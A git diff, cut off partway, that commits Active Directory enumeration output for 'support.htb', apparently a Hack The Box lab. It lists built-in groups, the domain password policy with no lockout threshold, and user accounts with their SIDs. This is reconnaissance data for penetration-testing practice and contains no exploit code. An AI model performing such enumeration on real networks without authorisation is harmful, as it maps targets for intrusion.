+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Performance Monitor Users,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Network Configuration Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members in this group can have some administrative privileges to manage configuration of networking features"
+ ],
+ "distinguishedName": [
+ "CN=Network Configuration Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Network Configuration Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{f88f6076-cf69-41b2-b187-3f306184a93e}"
+ ],
+ "objectSid": [
+ "S-1-5-32-556"
+ ],
+ "sAMAccountName": [
+ "Network Configuration Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8215
+ ],
+ "uSNCreated": [
+ 8215
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Network Configuration Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Remote Desktop Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members in this group are granted the right to logon remotely"
+ ],
+ "distinguishedName": [
+ "CN=Remote Desktop Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Remote Desktop Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{68505421-ea8e-4f5d-8316-bc1c66f9bb95}"
+ ],
+ "objectSid": [
+ "S-1-5-32-555"
+ ],
+ "sAMAccountName": [
+ "Remote Desktop Users"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8214
+ ],
+ "uSNCreated": [
+ 8214
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Remote Desktop Users,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Replicator"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Supports file replication in a domain"
+ ],
+ "distinguishedName": [
+ "CN=Replicator,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Replicator"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{a43fb4dd-d1a4-42c4-b62b-90a8cd946929}"
+ ],
+ "objectSid": [
+ "S-1-5-32-552"
+ ],
+ "sAMAccountName": [
+ "Replicator"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 13085
+ ],
+ "uSNCreated": [
+ 8213
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Replicator,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Backup Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Backup Operators can override security restrictions for the sole purpose of backing up or restoring files"
+ ],
+ "distinguishedName": [
+ "CN=Backup Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Backup Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{08394847-67d8-46b6-a20e-7f5568733a05}"
+ ],
+ "objectSid": [
+ "S-1-5-32-551"
+ ],
+ "sAMAccountName": [
+ "Backup Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 13082
+ ],
+ "uSNCreated": [
+ 8212
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Backup Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Print Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Members can administer printers installed on domain controllers"
+ ],
+ "distinguishedName": [
+ "CN=Print Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Print Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{1ae25623-2d0c-41ba-8849-1a5af8d1c8b6}"
+ ],
+ "objectSid": [
+ "S-1-5-32-550"
+ ],
+ "sAMAccountName": [
+ "Print Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 13080
+ ],
+ "uSNCreated": [
+ 8211
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Print Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Guests"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted"
+ ],
+ "distinguishedName": [
+ "CN=Guests,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Domain Guests,CN=Users,DC=support,DC=htb",
+ "CN=Guest,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Guests"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{4d18e3c5-48ec-4fbb-ad0e-41c5e5684942}"
+ ],
+ "objectSid": [
+ "S-1-5-32-546"
+ ],
+ "sAMAccountName": [
+ "Guests"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12383
+ ],
+ "uSNCreated": [
+ 8208
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Guests,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Users are prevented from making accidental or intentional system-wide changes and can run most applications"
+ ],
+ "distinguishedName": [
+ "CN=Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Domain Users,CN=Users,DC=support,DC=htb",
+ "CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=support,DC=htb",
+ "CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=support,DC=htb"
+ ],
+ "name": [
+ "Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{0d98d3da-a992-49b4-a6a3-5b1fb60c89af}"
+ ],
+ "objectSid": [
+ "S-1-5-32-545"
+ ],
+ "sAMAccountName": [
+ "Users"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12381
+ ],
+ "uSNCreated": [
+ 8202
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Users,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Administrators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Administrators have complete and unrestricted access to the computer/domain"
+ ],
+ "distinguishedName": [
+ "CN=Administrators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Domain Admins,CN=Users,DC=support,DC=htb",
+ "CN=Enterprise Admins,CN=Users,DC=support,DC=htb",
+ "CN=Administrator,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Administrators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{878a5a09-0d69-4bf6-b975-3bc4ae43dc78}"
+ ],
+ "objectSid": [
+ "S-1-5-32-544"
+ ],
+ "sAMAccountName": [
+ "Administrators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 13077
+ ],
+ "uSNCreated": [
+ 8199
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Administrators,CN=Builtin,DC=support,DC=htb"
+}] \ No newline at end of file
diff --git a/support/domaindump/domain_policy.grep b/support/domaindump/domain_policy.grep
new file mode 100644
index 0000000..3977254
--- /dev/null
+++ b/support/domaindump/domain_policy.grep
@@ -0,0 +1,2 @@
+distinguishedName lockOutObservationWindow lockoutDuration lockoutThreshold maxPwdAge minPwdAge minPwdLength pwdHistoryLength pwdProperties ms-DS-MachineAccountQuota
+DC=support,DC=htb 30.0 minutes 30.0 minutes 0 1000000000.00 days 1.00 days 7 24 PASSWORD_COMPLEX 10 \ No newline at end of file
diff --git a/support/domaindump/domain_policy.html b/support/domaindump/domain_policy.html
new file mode 100644
index 0000000..e812367
--- /dev/null
+++ b/support/domaindump/domain_policy.html
@@ -0,0 +1,34 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="10" id="cn_Domain_policy">Domain policy</td></tr></thead><tbody><tr><th>distinguishedName</th><th>Lockout time window</th><th>Lockout Duration</th><th>Lockout Threshold</th><th>Max password age</th><th>Min password age</th><th>Min password length</th><th>Password history length</th><th>Password properties</th><th>Machine Account Quota</th></tr>
+<tr><td>DC=support,DC=htb</td><td>30.0 minutes</td><td>30.0 minutes</td><td>0</td><td>1000000000.00 days</td><td>1.00 days</td><td>7</td><td>24</td><td>PASSWORD_COMPLEX</td><td>10</td></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/domaindump/domain_policy.json b/support/domaindump/domain_policy.json
new file mode 100644
index 0000000..1c7e202
--- /dev/null
+++ b/support/domaindump/domain_policy.json
@@ -0,0 +1,176 @@
+[{
+ "attributes": {
+ "auditingPolicy": [
+ "\u0000\u0001"
+ ],
+ "creationTime": [
+ "2022-08-19 04:31:47.260679+00:00"
+ ],
+ "dSASignature": [
+ {
+ "encoded": "AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAA5VYBKcsiG0+bllUW2Ew2PA==",
+ "encoding": "base64"
+ }
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "dc": [
+ "support"
+ ],
+ "distinguishedName": [
+ "DC=support,DC=htb"
+ ],
+ "fSMORoleOwner": [
+ "CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb"
+ ],
+ "forceLogoff": [
+ -9223372036854775808
+ ],
+ "gPLink": [
+ "[LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=support,DC=htb;0]"
+ ],
+ "instanceType": [
+ 5
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "lockOutObservationWindow": [
+ "0:30:00"
+ ],
+ "lockoutDuration": [
+ "0:30:00"
+ ],
+ "lockoutThreshold": [
+ 0
+ ],
+ "masteredBy": [
+ "CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb"
+ ],
+ "maxPwdAge": [
+ "999999999 days, 23:59:59.999999"
+ ],
+ "minPwdAge": [
+ "1 day, 0:00:00"
+ ],
+ "minPwdLength": [
+ 7
+ ],
+ "modifiedCount": [
+ 1
+ ],
+ "modifiedCountAtLastProm": [
+ 0
+ ],
+ "ms-DS-MachineAccountQuota": [
+ 10
+ ],
+ "msDS-AllUsersTrustQuota": [
+ 1000
+ ],
+ "msDS-Behavior-Version": [
+ 7
+ ],
+ "msDS-ExpirePasswordsOnSmartCardOnlyAccounts": [
+ true
+ ],
+ "msDS-IsDomainFor": [
+ "CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb"
+ ],
+ "msDS-NcType": [
+ 0
+ ],
+ "msDS-PerUserTrustQuota": [
+ 1
+ ],
+ "msDS-PerUserTrustTombstonesQuota": [
+ 10
+ ],
+ "msDs-masteredBy": [
+ "CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb"
+ ],
+ "nTMixedDomain": [
+ 0
+ ],
+ "name": [
+ "support"
+ ],
+ "nextRid": [
+ 1000
+ ],
+ "objectCategory": [
+ "CN=Domain-DNS,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "domain",
+ "domainDNS"
+ ],
+ "objectGUID": [
+ "{553cd9a3-86c4-4d64-9e85-5146a98c868e}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654"
+ ],
+ "otherWellKnownObjects": [
+ "B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=support,DC=htb",
+ "B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=support,DC=htb"
+ ],
+ "pwdHistoryLength": [
+ 24
+ ],
+ "pwdProperties": [
+ 1
+ ],
+ "rIDManagerReference": [
+ "CN=RID Manager$,CN=System,DC=support,DC=htb"
+ ],
+ "replUpToDateVector": [
+ {
+ "encoded": "AgAAAAAAAAAIAAAAAAAAAOVWASnLIhtPm5ZVFthMNjwCQAAAAAAAAPt+5xgDAAAAZ6vYPcTkRkO0MFdWs1QQvg8QAQAAAAAAVnnwGAMAAAD+QDhi4WGeQJzRK0Oxy/DzETABAAAAAADin/AYAwAAAE1xSnqneJdOoS4KYD+/c0AOAAEAAAAAAGMS6xgDAAAAd62sflaFQUqcdbgJy/UK7xJAAQAAAAAAMaMPGQMAAAA9xlubHL0ORprzS2KWPEOHBGAAAAAAAAB6xegYAwAAAJjUpNK4xSxHt3H97S3gZQcFcAAAAAAAAKPC6RgDAAAAJ7XI2ms7OEip16SpLPtxPgzgAAAAAAAAOjnqGAMAAAA=",
+ "encoding": "base64"
+ }
+ ],
+ "serverState": [
+ 1
+ ],
+ "subRefs": [
+ "DC=ForestDnsZones,DC=support,DC=htb",
+ "DC=DomainDnsZones,DC=support,DC=htb",
+ "CN=Configuration,DC=support,DC=htb"
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uASCompat": [
+ 0
+ ],
+ "uSNChanged": [
+ 81948
+ ],
+ "uSNCreated": [
+ 4099
+ ],
+ "wellKnownObjects": [
+ "B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=support,DC=htb",
+ "B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=support,DC=htb",
+ "B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=support,DC=htb",
+ "B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=support,DC=htb",
+ "B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=support,DC=htb",
+ "B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=support,DC=htb",
+ "B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=support,DC=htb",
+ "B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=support,DC=htb",
+ "B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=support,DC=htb",
+ "B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=support,DC=htb",
+ "B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=support,DC=htb"
+ ],
+ "whenChanged": [
+ "2022-08-19 04:31:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:46+00:00"
+ ]
+ },
+ "dn": "DC=support,DC=htb"
+}] \ No newline at end of file
diff --git a/support/domaindump/domain_trusts.grep b/support/domaindump/domain_trusts.grep
new file mode 100644
index 0000000..26e6406
--- /dev/null
+++ b/support/domaindump/domain_trusts.grep
@@ -0,0 +1 @@
+cn flatName securityIdentifier trustAttributes trustDirection trustType \ No newline at end of file
diff --git a/support/domaindump/domain_trusts.html b/support/domaindump/domain_trusts.html
new file mode 100644
index 0000000..57fd9a8
--- /dev/null
+++ b/support/domaindump/domain_trusts.html
@@ -0,0 +1,33 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="6" id="cn_Domain_trusts">Domain trusts</td></tr></thead><tbody><tr><th>CN</th><th>NETBIOS Domain name</th><th>securityIdentifier</th><th>trustAttributes</th><th>trustDirection</th><th>trustType</th></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/domaindump/domain_trusts.json b/support/domaindump/domain_trusts.json
new file mode 100644
index 0000000..0637a08
--- /dev/null
+++ b/support/domaindump/domain_trusts.json
@@ -0,0 +1 @@
+[] \ No newline at end of file
diff --git a/support/domaindump/domain_users.grep b/support/domaindump/domain_users.grep
new file mode 100644
index 0000000..01dd9d3
--- /dev/null
+++ b/support/domaindump/domain_users.grep
@@ -0,0 +1,21 @@
+cn name sAMAccountName memberOf primaryGroupId whenCreated whenChanged lastLogon userAccountControl pwdLastSet objectSid description
+ford.victoria ford.victoria ford.victoria Domain Users 05/28/22 11:15:57 05/28/22 11:15:58 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:15:58 S-1-5-21-1677581083-3380853377-188903654-1120
+stoll.rachelle stoll.rachelle stoll.rachelle Domain Users 05/28/22 11:15:42 05/28/22 11:15:43 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:15:42 S-1-5-21-1677581083-3380853377-188903654-1119
+daughtler.mabel daughtler.mabel daughtler.mabel Domain Users 05/28/22 11:15:26 05/28/22 11:15:27 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:15:26 S-1-5-21-1677581083-3380853377-188903654-1118
+langley.lucy langley.lucy langley.lucy Domain Users 05/28/22 11:15:10 05/28/22 11:15:11 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:15:10 S-1-5-21-1677581083-3380853377-188903654-1117
+west.laura west.laura west.laura Domain Users 05/28/22 11:14:55 05/28/22 11:14:56 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:14:55 S-1-5-21-1677581083-3380853377-188903654-1116
+monroe.david monroe.david monroe.david Domain Users 05/28/22 11:14:39 05/28/22 11:14:40 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:14:39 S-1-5-21-1677581083-3380853377-188903654-1115
+cromwell.gerard cromwell.gerard cromwell.gerard Domain Users 05/28/22 11:14:24 05/28/22 11:14:24 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:14:24 S-1-5-21-1677581083-3380853377-188903654-1114
+bardot.mary bardot.mary bardot.mary Domain Users 05/28/22 11:14:08 05/28/22 11:14:09 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:14:08 S-1-5-21-1677581083-3380853377-188903654-1113
+raven.clifton raven.clifton raven.clifton Domain Users 05/28/22 11:13:52 05/28/22 11:13:53 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:13:53 S-1-5-21-1677581083-3380853377-188903654-1112
+levine.leopoldo levine.leopoldo levine.leopoldo Domain Users 05/28/22 11:13:37 05/28/22 11:13:38 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:13:37 S-1-5-21-1677581083-3380853377-188903654-1111
+thomas.raphael thomas.raphael thomas.raphael Domain Users 05/28/22 11:13:21 05/28/22 11:13:22 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:13:21 S-1-5-21-1677581083-3380853377-188903654-1110
+anderson.damian anderson.damian anderson.damian Domain Users 05/28/22 11:13:05 05/28/22 11:13:06 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:13:05 S-1-5-21-1677581083-3380853377-188903654-1109
+wilson.shelby wilson.shelby wilson.shelby Domain Users 05/28/22 11:12:50 05/28/22 11:12:51 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:12:50 S-1-5-21-1677581083-3380853377-188903654-1108
+hernandez.stanley hernandez.stanley hernandez.stanley Domain Users 05/28/22 11:12:34 05/28/22 11:12:35 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:12:34 S-1-5-21-1677581083-3380853377-188903654-1107
+smith.rosario smith.rosario smith.rosario Domain Users 05/28/22 11:12:19 05/28/22 11:12:19 01/01/01 00:00:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:12:19 S-1-5-21-1677581083-3380853377-188903654-1106
+support support support Shared Support Accounts, Remote Management Users Domain Users 05/28/22 11:12:00 08/19/22 13:47:57 08/19/22 14:44:55 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:12:00 S-1-5-21-1677581083-3380853377-188903654-1105
+ldap ldap ldap Domain Users 05/28/22 11:11:46 08/19/22 13:02:01 08/19/22 14:53:00 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:11:46 S-1-5-21-1677581083-3380853377-188903654-1104
+krbtgt krbtgt krbtgt Denied RODC Password Replication Group Domain Users 05/28/22 11:03:43 05/28/22 11:19:47 01/01/01 00:00:00 ACCOUNT_DISABLED, NORMAL_ACCOUNT 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-502 Key Distribution Center Service Account
+Guest Guest Guest Guests Domain Guests 05/28/22 11:01:56 08/19/22 06:15:24 01/01/01 00:00:00 PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 05/28/22 11:18:55 S-1-5-21-1677581083-3380853377-188903654-501 Built-in account for guest access to the computer/domain
+Administrator Administrator Administrator Group Policy Creator Owners, Domain Admins, Enterprise Admins, Schema Admins, Administrators Domain Users 05/28/22 11:01:56 08/19/22 04:32:27 08/19/22 04:32:50 NORMAL_ACCOUNT 07/19/22 17:55:56 S-1-5-21-1677581083-3380853377-188903654-500 Built-in account for administering the computer/domain \ No newline at end of file
diff --git a/support/domaindump/domain_users.html b/support/domaindump/domain_users.html
new file mode 100644
index 0000000..bea5dd8
--- /dev/null
+++ b/support/domaindump/domain_users.html
@@ -0,0 +1,53 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="12" id="cn_Domain_users">Domain users</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Member of groups</th><th>Primary group</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>ford.victoria</td><td>ford.victoria</td><td>ford.victoria</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:15:57</td><td>05/28/22 11:15:58</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:58</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1120">1120</abbr></td><td>&nbsp;</td></tr>
+<tr><td>stoll.rachelle</td><td>stoll.rachelle</td><td>stoll.rachelle</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:15:42</td><td>05/28/22 11:15:43</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:42</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1119">1119</abbr></td><td>&nbsp;</td></tr>
+<tr><td>daughtler.mabel</td><td>daughtler.mabel</td><td>daughtler.mabel</td><td>&nbsp;</td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=support,DC=htb">Domain Users</a></td><td>05/28/22 11:15:26</td><td>05/28/22 11:15:27</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:26</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1118">1118</abbr></td><td>&nbsp;</td></tr>
